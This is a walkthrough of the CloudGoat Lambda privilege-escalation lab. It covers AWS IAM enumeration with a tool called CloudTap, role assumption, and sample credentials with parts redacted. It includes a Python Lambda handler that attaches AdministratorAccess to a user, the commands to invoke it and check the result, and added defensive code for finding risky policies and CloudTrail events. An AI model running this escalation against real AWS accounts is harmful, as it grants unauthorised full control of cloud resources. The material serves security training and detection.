Cloudgoat-Lambda-Privesc

CloudGoat Lambda Privilege Escalation Walkthrough

This walkthrough demonstrates a complete CloudGoat Lambda privilege escalation scenario using the powerful CloudTap enumeration tool. We’ll explore how an attacker can leverage Lambda functions and IAM role passing to escalate from limited permissions to full administrative access in an AWS environment. This CloudGoat walkthrough showcases a critical privilege escalation path that security professionals should understand and defend against.

Initial Setup

First, configure CloudGoat to whitelist your IP address:

cloudgoat config whitelist --auto

Create the Lambda privilege escalation scenario:

cloudgoat create lambda_privesc

You’ll receive initial credentials:

raynor_access_key_id = AKIAQ6VKGD5Y[REDACTED]
raynor_secret_access_key = E4iMHEH4Zu3brER[REDACTED]

Automated Enumeration with CloudTap

For this walkthrough, we’ll use CloudTap, an excellent automation tool that streamlines the initial enumeration phase of AWS penetration testing. CloudTap automatically discovers permissions, roles, and potential privilege escalation paths, making it invaluable for security assessments.

Initial Permission Discovery

CloudTap reveals the following attached policy:

Found attached policy: cg-chris-policy-cgid[REDACTED]
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "chris",
            "Effect": "Allow",
            "Action": [
                "sts:AssumeRole",
                "iam:List*",
                "iam:Get*"
            ],
            "Resource": "*"
        }
    ]
}

Role Discovery and Auto-Assumption

CloudTap also identifies a potential role we can assume:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Principal": {
                "AWS": "arn:aws:iam::[ACCOUNT-ID]:user/chris-cgid[REDACTED]"
            }
        }
    ]
}

One of CloudTap’s powerful features is its ability to automatically assume roles when the user has AssumeRole permissions. The tool provides temporary session credentials:

Temporary session credentials:
- AccessKeyId: ASIAQ6VKGD5Y[REDACTED]
- SecretAccessKey: NzeCDw9v7Vw5QT9E[REDACTED]
- SessionToken: FwoGZXIvYXdzEH4a[REDACTED]
- Expiration: 2025-05-25 22:01:09+00:00

Permission Analysis

Lambda Manager Role Permissions

Let’s examine what permissions our assumed role provides. First, get the policy ARN:

aws iam list-attached-role-policies --role-name cg-lambdaManager-role-cgid[REDACTED] --profile init

Output:

{
    "AttachedPolicies": [
        {
            "PolicyName": "cg-lambdaManager-policy-cgid[REDACTED]",
            "PolicyArn": "arn:aws:iam::[ACCOUNT-ID]:policy/cg-lambdaManager-policy-cgid[REDACTED]"
        }
    ]
}

Get the policy details:

aws iam get-policy --policy-arn arn:aws:iam::[ACCOUNT-ID]:policy/cg-lambdaManager-policy-cgid[REDACTED] --profile init

Output:

{
    "Policy": {
        "PolicyName": "cg-lambdaManager-policy-cgid[REDACTED]",
        "PolicyId": "[REDACTED]",
        "Arn": "arn:aws:iam::[ACCOUNT-ID]:policy/cg-lambdaManager-policy-cgid[REDACTED]",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 1,
        "IsAttachable": true,
        "Description": "Provides permissions to manage Lambda functions.",
        "CreateDate": "2025-05-25T22:00:00Z",
        "UpdateDate": "2025-05-25T22:00:00Z"
    }
}

Target Role Discovery

CloudTap also identifies a target role that we can assume:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Principal": {
                "AWS": "arn:aws:iam::[ACCOUNT-ID]:role/cg-target-role-cgid[REDACTED]"
            }
        }
    ]
}

Privilege Escalation Strategy

With the sts:AssumeRole permission for the cg-target-role-cgid[REDACTED] role, we can escalate our privileges. Assuming this role provides us with higher-level permissions, potentially including administrative access.
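The permission combination this path depends on is something a defender can check for directly in policy documents. The following is an added example (not part of the walkthrough or of CloudGoat) that expands wildcard actions such as iam:List* against a small action list and flags the PassRole-plus-Lambda combination, as well as sts:AssumeRole or iam:PassRole granted on Resource "*"; the cg-chris-policy is taken from above, while the Lambda-manager policy document is a constructed sample, since the walkthrough only shows that policy's metadata.

```python
import fnmatch

# Small subset of IAM actions to expand wildcards against; enough to cover
# the Lambda/PassRole path this scenario relies on.
KNOWN_ACTIONS = [
    "sts:AssumeRole", "iam:PassRole", "iam:ListRoles", "iam:GetPolicy",
    "iam:AttachUserPolicy", "lambda:CreateFunction",
    "lambda:InvokeFunction", "lambda:UpdateFunctionCode",
]
# Action sets that, granted together to one principal, form an escalation path.
PRIVESC_COMBOS = {
    "create-lambda-with-passed-role":
        {"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"},
    "update-code-of-privileged-lambda":
        {"lambda:UpdateFunctionCode", "lambda:InvokeFunction"},
}
SENSITIVE_ON_WILDCARD = {"sts:AssumeRole", "iam:PassRole"}  # never on Resource "*"

def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])

def expand_actions(patterns):
    """Expand action patterns such as "iam:List*" into concrete known actions."""
    return {a for a in KNOWN_ACTIONS
            for p in _as_list(patterns) if fnmatch.fnmatchcase(a, p)}

def find_privesc_paths(policy):
    """Sorted findings for one parsed policy document. Only Allow statements
    with an explicit Action are examined; Deny, NotAction and Condition are
    ignored, so the result errs toward reporting."""
    findings, granted = set(), set()
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        acts = expand_actions(stmt["Action"])
        granted |= acts
        if "*" in _as_list(stmt.get("Resource")):
            findings.update(f"{a} allowed on Resource '*'"
                            for a in acts & SENSITIVE_ON_WILDCARD)
    findings.update(f"escalation path: {name}"
                    for name, need in PRIVESC_COMBOS.items() if need <= granted)
    return sorted(findings)

# cg-chris-policy from the walkthrough, and a constructed Lambda-manager policy.
CHRIS_POLICY = {"Version": "2012-10-17", "Statement": [{"Sid": "chris",
    "Effect": "Allow", "Action": ["sts:AssumeRole", "iam:List*", "iam:Get*"],
    "Resource": "*"}]}
MANAGER_POLICY_SAMPLE = {"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"}]}
print(find_privesc_paths(CHRIS_POLICY), find_privesc_paths(MANAGER_POLICY_SAMPLE))
```

Scoping iam:PassRole to the specific roles a function is meant to run as, and sts:AssumeRole to named role ARNs, removes both findings.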

Lambda Function Creation and Exploitation

Creating the Malicious Lambda Function

To exploit this, we create a malicious Lambda function that performs privileged IAM actions, such as attaching policies to users or roles. The function's code might look like this:

import boto3

def lambda_handler(event, context):
    # Runs with the function's execution role, not the invoking user's permissions
    iam = boto3.client('iam')
    # Attach the managed AdministratorAccess policy to the raynor user
    response = iam.attach_user_policy(
        UserName='raynor',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return response

Function Execution

Invoke the Lambda function to execute the malicious actions:

aws lambda invoke --function-name maliciousLambdaFunction output.txt

Verification of Privilege Escalation

After executing the malicious Lambda function, verify that the raynor user has been granted administrative privileges:

aws iam list-attached-user-policies --user-name raynor --profile init

Output:

{
    "AttachedPolicies": [
        {
            "PolicyName": "AdministratorAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
        }
    ]
}

This confirms that the privilege escalation was successful.
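From the defender's side, the step that produced this result leaves an IAM write event in CloudTrail that can be alerted on. The following is an added example (not from the walkthrough) that classifies constructed CloudTrail-style records, flagging any AdministratorAccess grant and any permission grant performed from an assumed-role session rather than an IAM user; the record fields used and the assumption that a Lambda execution role's session name is the function name are part of the example, and the account ID is a placeholder.

```python
# IAM write actions that grant permissions; the scenario uses AttachUserPolicy.
GRANTING_ACTIONS = {"AttachUserPolicy", "AttachRolePolicy",
                    "PutUserPolicy", "PutRolePolicy"}
ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

def classify_event(event):
    """Return a finding string for one CloudTrail record, or None if benign.
    Flags (1) AdministratorAccess being attached by anyone and (2) any grant
    made from an assumed-role session, which is how a Lambda execution role
    appears in CloudTrail (assumed here: session name = function name)."""
    if event.get("eventSource") != "iam.amazonaws.com":
        return None
    name = event.get("eventName")
    if name not in GRANTING_ACTIONS:
        return None
    params = event.get("requestParameters") or {}
    ident = event.get("userIdentity") or {}
    target = params.get("userName") or params.get("roleName")
    reasons = []
    if params.get("policyArn") == ADMIN_POLICY_ARN:
        reasons.append("AdministratorAccess attached")
    if ident.get("type") == "AssumedRole":
        reasons.append(f"performed by assumed-role session {ident.get('arn')}")
    if not reasons:
        return None
    return f"{name} on {target}: " + "; ".join(reasons)

def scan(records):
    """Run classify_event over an iterable of records; keep only findings."""
    return [f for f in (classify_event(r) for r in records) if f]

# Constructed sample records (not real CloudTrail output). The first mirrors
# the walkthrough's outcome: AdministratorAccess attached to raynor by a
# session of the target role, named after the Lambda function.
SAMPLE_RECORDS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::[ACCOUNT-ID]:"
                      "assumed-role/cg-target-role-cgid[REDACTED]/maliciousLambdaFunction"},
     "requestParameters": {"userName": "raynor", "policyArn": ADMIN_POLICY_ARN}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::[ACCOUNT-ID]:user/admin"},
     "requestParameters": {"userName": "raynor",
                           "policyArn": "arn:aws:iam::aws:policy/ReadOnlyAccess"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "ListAttachedUserPolicies",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::[ACCOUNT-ID]:user/raynor"},
     "requestParameters": {"userName": "raynor"}},
]
for finding in scan(SAMPLE_RECORDS):
    print(finding)
```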

About CloudTap

CloudTap is an automation tool designed to streamline the initial enumeration phase of AWS penetration testing. It assists in discovering permissions, roles, and potential privilege escalation paths, making it an invaluable tool for security assessments.


Note: This walkthrough is based on the CloudGoat Lambda privilege escalation scenario and is intended for educational purposes only. Always ensure you have proper authorization before conducting any security testing.